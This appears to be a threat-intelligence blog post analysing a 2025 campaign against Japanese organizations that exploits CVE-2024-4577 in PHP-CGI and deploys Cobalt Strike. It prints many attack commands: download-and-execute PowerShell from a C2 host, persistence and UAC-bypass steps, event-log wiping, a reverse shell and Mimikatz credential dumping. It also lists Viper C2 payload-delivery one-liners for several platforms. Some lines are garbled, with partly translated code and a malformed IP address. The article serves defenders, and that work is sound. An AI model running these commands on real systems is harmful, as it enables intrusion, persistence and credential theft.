03.11.2025
7 min
391
This article examines a new wave of sustained, targeted cyberattacks against organizations in Japan. It explains how attackers gain initial access, what tools they use to infiltrate networks, and why this case has caught the attention of cybersecurity analysts. It provides a detailed breakdown of the techniques involved, advanced reconnaissance and penetration methods, and an analysis of how the attacks remain hidden for long periods of time. It also explains why public hacking frameworks are dangerous, how they help attackers scale their attacks, and why traditional defenses may fail.
In early 2025, a sustained and well-planned wave of cyberattacks was recorded, targeting organizations primarily in Japan. The incidents spanned a variety of industries, including technology, telecommunications, education, and e-commerce, suggesting a broad range of interests and potential political and economic motivations.
The initial penetration was achieved through CVE-2024-4577, a critical vulnerability that allows remote code execution in PHP-CGI on Windows. This vulnerability, present in a number of server configurations, opened the way to a full compromise of systems, after which the attackers gained control at the operating system level.
Once accessed, plugins from the public Cobalt Strike “TaoWu” set were used, allowing them to escalate privileges to SYSTEM level, establish themselves on the network, hide activity, and collect credentials. A pre-configured installation script was found on the management servers, which automatically deploys a set of tools and frameworks hosted in a cloud container repository. This suggests a systemic approach to the attack and the possible use of infrastructure to scale the campaign.
This scenario highlights a current trend of actively exploiting vulnerabilities in widely available software, public post-exploitation tools, and automated means to rapidly deploy malicious platforms. The actions captured indicate that the attackers’ goal may have gone far beyond stealing credentials, likely envisioning a long-term presence on networks and potential future operations.
The attacker was found to be primarily targeting organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artifacts.
The attacker attempts to compromise the victim’s machine using an exploit targeting CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI PHP implementation on Windows. If successfully exploited, the attacker executes a PowerShell script to launch a Cobalt Strike reverse HTTP shellcode, providing remote access to the victim’s machine.
They then begin reconnaissance, gathering information about the system and user privileges. They run privilege escalation exploits such as JuicyPotato, RottenPotato, and SweetPotato to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using a Cobalt Strike suite plugin called “TaoWu”.
To maintain stealth, they wipe event logs using wevtutil commands, removing traces of their actions from the Windows Security, System, and Application logs. They also conduct network reconnaissance using “fscan.exe” and “Seatbelt.exe” to identify potential targets for lateral movement. The attacker also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Finally, they execute Mimikatz commands to create a dump and extract passwords and NTLM hashes from memory on the victim’s computer.
It was discovered that the attacker gains initial access to the victim’s network by exploiting a vulnerability CVE-2024-4577.
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It occurs due to a “best-approximation” behavior in Windows code pages where certain characters are substituted in command-line data. Flaws in the PHP-CGI module incorrectly interpret these characters as PHP parameters, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI configuration.
To exploit the vulnerability, the attacker uses a publicly available Python exploit script “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks whether a given URL is vulnerable to the CVE-2024-4577 vulnerability. It does this by sending a specially crafted POST request to the target URL with PHP code designed to activate the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, this indicates a successful exploitation. The exploit script then prompts the user to enter commands in the form of PHP code that are executed on the vulnerable servers and displays the response to the attacker.
During this intrusion, it was discovered that the attacker executed an embedded PowerShell command in the PHP code to trigger the infection.
<?php system ('powershell -c "Вираз виклику (Новий об'єкт System.Net.WebClient).DownloadString(\'http[://]38[.]14[.]255[.]238000/корисне навантаження[.]ps1\')"');?>
The attacker initiates the infection by executing a PowerShell command via PHP code, which results in the PowerShell injector script being downloaded and executed from the C2 server in the victim machine’s memory.
The PowerShell injector script contains an embedded Cobalt Strike reverse HTTP shellcode data blob in base64 or hexadecimal encoding. Once executed, it injects and executes the Cobalt Strike reverse HTTP shellcode in the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server via HTTP, providing remote access to the victim machine.
The shellcode connects to the C2 server 38[.]14[.]255[.]23 via HTTP using port 8077 and URL paths “/6Qeq” or “/jANd.” The attacker used one of two HTTP header user agents.
User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)
After gaining remote access to the victim’s machine via Cobalt Strike’s reverse HTTP shellcode, the attacker remotely executes commands on the victim’s machine from a Cobalt Strike server configured with plugins from the Cobalt Strike “TaoWu” suite (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform post-exploitation tasks.
Below are the post-exploit commands that were present during this attack and that are relevant to the framework MITRE ATT&CK.
The attacker collects the victim’s system and user information, as well as checks time synchronization by remotely executing the following commands on the victim’s machine.
whoami /all dir net time
The attacker attempts to elevate a user’s privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits use the Windows method for handling authentication and impersonation tokens to elevate privileges from a low-privileged user to the SYSTEM user.
Microsoft has already patched the vulnerabilities targeted by these exploits in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in later versions. However, if a Windows process has the “SeImpersonatePrivilege” permission enabled, which allows the process to impersonate another user’s security token, it can still be abused to elevate privileges using JuicyPotato, SweetPotato, and RottenPotato.
The attacker uses Ladon[.]exe, a plugin for the Cobalt Strike “TaoWu” suite, to bypass user access controls on the victim’s computer.
Ladon.exe BypassUac C:\Windows\Temp\123.exe
The attacker uses the “reg add” command and other .NET plugins from the TaoWu Cobalt Strike suite to modify registry keys and create scheduled Windows tasks to ensure their persistence on the victim’s computer.
The attacker executes the “reg add” command to add the path to the beacon executable to the Run registry key.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f C:\Windows\Temp\payload.exe
The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on a Windows computer.
sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30 \ some Service "Some Service" C:\Windows\Temp\payload.exe
They run “SharpHide.exe”, a utility used to create a hidden registry key.
SharpHide.exe action=create keyvalue="C:\Windows\Temp\123.exe"
They also run “SharpStay.exe” – a .NET tool used to create a service on a Windows computer.
SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\tmp\payload.exe"
The attacker removes evidence of his activity on the victim’s computer by cleaning the Windows event logs on the compromised endpoint using the “wevtutil.exe” binary (LoLBin).
wevtutil cl security wevtutil cl system wevtutil cl application wevtutil cl windows powershell
The attacker uses fscan.exe, an open source network scanning utility, and Seatbelt, a tool used to collect detailed system information such as remote access configurations, network shares, and other security-related data on the victim’s computer, to conduct network reconnaissance and lateral movement into the victim’s network.
The attacker downloads the “fscan.exe” utility from the C2 server to the “C:\Windows\Temp” directory on the victim’s machine.
upload /"C2 server path"/fscan.exe
The attacker runs the .NET program “Seatbelt.exe” to collect information related to remote access to the victim’s computer.
Seatbelt.exe -group=Remote -full
The attacker runs “SharpGPOAbuse.exe,” a tool used to abuse Group Policy Objects (GPOs) for malicious purposes. The attacker creates a scheduled task via the GPO called “update” that executes a PowerShell command over the network that downloads and executes the attacker’s PowerShell payload.
SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]238000/payload.ps1\'))"" --GPOName "Default Server Policy"
The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services on the subnet.
fscan.exe -h 192[.]168[.]1[.]1/24
The attacker finds SSH services that accept the public key by automating SSH brute force, providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. He also attempts to gain full access to SSH credentials for services running on a port other than the default (2222) port.
fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222
Using the fscan utility, the attacker opens a reverse shell that allows them to execute commands on the victim’s machines in the subnet, connecting back to their server on port 6666, and executes the “whoami” command on accessible machines.
fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami
The attacker executes Mimikatz commands to collect plaintext passwords and NTLM hashes from memory on the victim’s computer.
sekurlsa::logonpasswords
The exploits were found to gain initial access and launch Cobalt Strike reverse HTTP beacons, which provided constant remote control over compromised machines. The post-exploitation actions used the Cobalt Strike “TaoWu” suite with plugins such as sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, fscan, and the Mimikatz credential harvesting tool.
According to DFIR, similar methods have previously been recorded during operations associated with a group known as “Dark Cloud Shield” or “You Dun”, but direct attribution in this case has not been confirmed: after the credentials were extracted, no additional characteristic activity was recorded that would indicate belonging to this group.
The attacker was found to be using two management servers, 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77, hosted in the Alibaba cloud where the Cobalt Strike server was running. On the 38[.]14[.]255[.]23 server, open directories and a root folder were accessible, which stored PowerShell scripts, Cobalt Strike beacon executables, exploits, and logs of executed commands.
Content analysis showed that the attacker downloaded and executed a pre-configured LinuxEnvConfig.sh installation shell script from the “yijingsec” repository on Gitee. This script is designed to configure Ubuntu/Debian/Kali environments and deploy publicly available offensive security tools (Vulfocus, ARL, Viper C2, Starkiller, BeEF, Blue-Lotus) as Docker containers from registry[.]cn-shanghai[.]aliyuncs[.]com. In addition, running the script changes the host’s DNS settings to point to the 114[.]114[.]114[.]114 server (114DNS service), which is unusual for most regions.
We also found a consistent trend of exploiting publicly available tools (Cobalt Strike, Metasploit, ARL, Vulfocus, PowerShell Empire) in malicious campaigns. However, the LinuxEnvConfig script also deploys frameworks that are less common in criminal kits — Blue-Lotus, BeEF, and Viper C2; their capabilities and functionality are documented in the blog to show how these tools can be used for attack and exploitation phases.
Blue-Lotus is a cross-site scripting attack framework based on a JavaScript web shell. Blue-Lotus is based on Docker and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology research and competition team at Tsinghua University.
The Blue-Louts admin panel is in Chinese and contains a control panel for hosting XSS crimes, which displays the connection details of the victim’s computer, including the IP address and browser.
Blue-Lotus has a payload generation panel where the user can generate a JavaScript web shell payload using a default JavaScript template from the tool’s database. An attacker using the framework can generate a web shell and use it in their attacks to perform the following tasks:
Cross-site scripting (XSS).
Take a screenshot of a remote machine.
Get reverse access to a remote machine via a shell.
Steal browser cookies.
Create user ID and passwords in a content management system (CMS).
BeEF is a publicly available browser exploit framework that allows an attacker to connect to one or more web browsers on a victim’s computer and execute commands in the context of the browser. BeEF has command modules consisting of JavaScript code to perform the following tasks:
Check if links, forms, and web page URIs in the connected browser are vulnerable to XSS.
Send arbitrary requests on behalf of the connected browser.
Interact with a host on the connected browser’s local network.
Send commands to victim systems via a Web Real-Time Communication (WebRTC) call.
Viper C2 is a modular framework with several plugins and scripts that define its advanced functionality. C2 has built-in integration with the meterpreter console and scripts (MSF).
Viper C2 has the following functionalities:
Bypass antivirus software.
Intranet tunnel.
File management on a remote machine, such as downloading and executing other executables.
Remotely execute a command on a compromised host.
Generate Meterpreter backshell payloads in multiple forms that run on Windows, Linux, and MacOS.
Display the topology of a compromised network.
Viper C2 has the ability to generate HTTP and TCP Meterpreter backshell payloads for various platforms including Windows, Linux, MacOS, Android, Java, and Python. The payload can be generated in various formats such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, as well as HTA and VBA scripts.
The generated payloads are delivered to victims using Viper C2 web delivery commands that the user can generate, including the delivery URL and tool in their attacks.
Below are examples of commands generated by Viper C2 that help defenders and threat hunters detect activities related to this framework:
Windows:
regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll
Linux:
wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown
PHP:
php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));"
Python:
python -c "import sys;import ssl;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlope n',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());"
PowerShell:
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
$pbFU=new-object net.webclient;
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy();
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};
IEX ((new-objectNet.WebClient).DownloadString('C2 server:port/WyeslpUl/KaptrNuHdqhM'));
IEX ((new-objectNet.WebClient).DownloadString('C2 server:port’);
Linux download and execute:
wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port /api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 1737698200.elf && ./1737698200.elf
A targeted and technically sophisticated campaign has been identified that, via CVE-2024-4577, infiltrates Windows servers with PHP-CGI and deploys Cobalt Strike and related tools for privilege escalation, persistence, and credential theft. This is not an isolated operation – PHP-CGI installations should be inspected, looking for persistence traces and suspicious outbound connections, as the threat of a long-term presence on networks is real.
